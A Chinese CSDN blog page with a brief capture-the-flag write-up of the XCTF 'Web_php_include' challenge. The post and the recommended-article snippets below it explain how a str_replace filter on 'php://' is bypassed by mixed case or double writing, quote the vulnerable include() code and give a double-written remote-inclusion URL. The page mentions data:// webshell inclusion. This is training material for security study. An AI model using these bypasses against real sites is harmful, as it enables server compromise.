攻防世界2分题(Web_php_include)

最新推荐文章于 2024-05-04 10:37:19 发布
最新推荐文章于 2024-05-04 10:37:19 发布
阅读量288 收藏
点赞数
分类专栏: 网安
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45791542/article/details/107731652
版权

  • 看题
    在这里插入图片描述

  • 一串简短的PHP代码,这里对page这个参数用str_replace函数进行了过滤,str_replace函数的作用是匹配前面一段字符,匹配到的话就替换成后面一段,所以这里的代码意思就是,假如我们传入的page参数包含php://就会被替换成空字符。并且判断page里面文件是否存在,存在则包含文件。

  • 绕过str_replace函数,经查资料知道str_replace这个函数及其不安全

  • 关于绕过函数str_replace的方法

    1.大小写绕过
    2. 双写绕过

    这里用大小写绕过

  • 抓包先
    在这里插入图片描述在这里插入图片描述

Phoenix-Pl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
由题目XCTF Web_php_include 复习包含漏洞
jelly
07-05 1007
题目url:http://220.249.52.133:47390 代码分析 题目一来就是一段代码,分析一下 show_source() 函数对文件进行语法高亮显示 hello用get方式接收参数直接输出 page参数也是通过get方式接收,strstr(str1,str2) 函数用于判断字符串str2是否是str1的子串,但是区分大小写,如果不区分大小写使用stristr()函数。这里的意思是如果page参数中包含"php://",就替换为空。 通过过滤后包含page参数传来的文件。 .
攻防世界】四、Web_php_include
Hi~ 土拨鼠
01-20 450
步骤 打开所给的实验环境,发现给出代码,分析代码可知是文件包含漏洞: 其中含有两个参数: hello参数中的内容会被输出到页面 page参数中的内容则会被进行文件包含,但是会对php://进行过滤 两个函数: strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。区分大小写,stristr()函数不区分大小写。 string:必需。规定.
最新PHP CTF常见考题的绕过技巧_str_replace函数绕过(1)
最新发布
05-04 720
PHP中md5()函数无法处理数组(会返回NULL)==的也可以用数组绕过。
PHP WEB练习题
Tttttttimer的博客
11-07 872
使用hackbar简单设置参数 第一题非常简单,看代码其实就是submit设置参数了就可以看到flag了。 <?php if (isset($_POST["submit"])) { include("flag2.php"); echo "Congratulations! FLAG is : ".$flag; } show_source(__FILE__); ?>...
【XCTF 攻防世界WEB 高手进阶区 Web_php_include
weixin_45844670的博客
08-23 1463
目录基础题解本题相关知识点:一题多解:**php文件包含****一句话木马****data://伪协议**data://伪协议+一句话木马 基础题解 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 上面这段
攻防世界-Web_php_include详解
Mr_helloword的博客
08-11 8624
Web_php_include 源代码: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 分析: strstr(): 定义和用法: 搜索字符串在另一个字符串中是否存在,如果是,返回字符串及剩余部分,否则返回
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
中国首届医院网络安全攻防演练Web部分真题
07-13
中国首届医院网络安全攻防演练Web部分真题,厦门站。一个WEB站点 源码。
网络web安全与攻防技术_漏洞分析_网络攻防_网络安全_vulnerability_
09-29
常见网络安全协议工具使用方法,web安全漏洞分析、漏洞案例,web攻防思路分享。
web_easy_
09-30
【标题】"web_easy_" 指的可能是一款基于Web的用户界面皮肤,它经过了定制化设计,以满足特定客户的需求。"web"通常代表Web应用或网站,而"_easy_"部分可能意味着这款皮肤追求的是简洁易用的用户体验。 在Web开发中...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界web高阶2分题PHP2)
qq_45791542的博客
08-01 304
读题 一看懵了…不知道要干啥 参考大佬wp /index.phps发现代码泄露 查看源代码 分析代码: 第一步,要使得"admin"===$_GET[id]不成立 第二步,经过$_GET[id] = urldecode($_GET[id]);,使得$_GET[id] == "admin"成立。 具体 当传入参数id时,浏览器在后面会对非ASCII码的字符进行一次urlencode 然后在这段代码中运行时,会自动进行一次urldecode 在urldecode()函数中,再一次进
PHP CTF常见考题的绕过技巧
热门推荐
m0_48108919的博客
04-07 1万+
1.===绕过 PHP比较运算符 ===在进行比较的时候,会先判断两种字符串的类型是否相等,再比较值是否相等。 只要两边字符串类型不同会返回false
文件包含漏洞之——str_replace函数绕过与——包含截断绕过
温柔小薛的博客
04-08 6427
str_replace函数绕过 实验环境DVWA,安全性medium 有时程序员会使用str_replace函数进行防御,这个函数是极其不安全的,因为可以使用双写绕过替换规则轻松绕过 绕过方法 例如page=hthttp://tp://192.168.0.103/phpinfo.txt时,str_replace函数会将http://删除,于是page=http://192.168.0.103...
php str replace 原理,因str_replace导致的注入问题总结
weixin_39961369的博客
03-19 672
研究了下replace的注入安全问题。一般sql注入的过滤方式就是引用addslashes函数进行过滤。他会把注入的单引号转换成\',把双引号转换成\",反斜杠会转换成\\等写一段php代码:$x=$_GET['x'];$id=str_replace(addslashes($_GET['y']),'',addslashes($x));echo "过滤后:".addslashes($x)."";ec...
上传漏洞的绕过
weixin_51313108的博客
08-17 403
这里写目录标题绕过的思考客户端绕过控制js代码bp修改请求数据包服务器端绕过MIME检测00截断 绕过的思考 web应用程序往往允许客户端上传文件,但是程序员如果不对上传的文件进行验证和限制就会导致文件上传漏洞。检测上传的文件有俩方面,客户端检测和服务器端检测。 客户端绕过 客户端是通过js代码来实现对文件的检测。那么攻击者就可以控制js代码来绕过或者修改http请求绕过。 控制js代码 一段前端代码 <form action="" method="post" enctype="multipa
CG-CTF 综合题2(sql注入绕过、注入技巧、preg_replace()漏洞)☆
Sea_Sand息禅
03-19 5757
这道题确实综合性挺强的。 1、老程序,先收集信息。 页面可以输入的地方可以输入些信息试试,搜索框输入1,会转到so.php,这里是有sql查询的。 留言的地方,输入可以转到preview.php,预览之后转到say.php。 最下面有个“本CMS说明”,这个点击之后会得到更多的信息: config.php index.php passencode.php say.php sm.txt 还给了我们...
php str_replace技巧-避免重复替换
CyborgLin的博客
01-15 1033
php str_replace技巧-避免重复替换
攻防世界web_php_include
03-16
攻防世界中的 web_php_include 是一种漏洞,它指的是在 PHP 程序中使用 include 或 require 语句加载文件时可能存在的安全问题。这种漏洞可能导致远程代码执行攻击,允许攻击者在服务器上执行任意代码。为了防止这种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值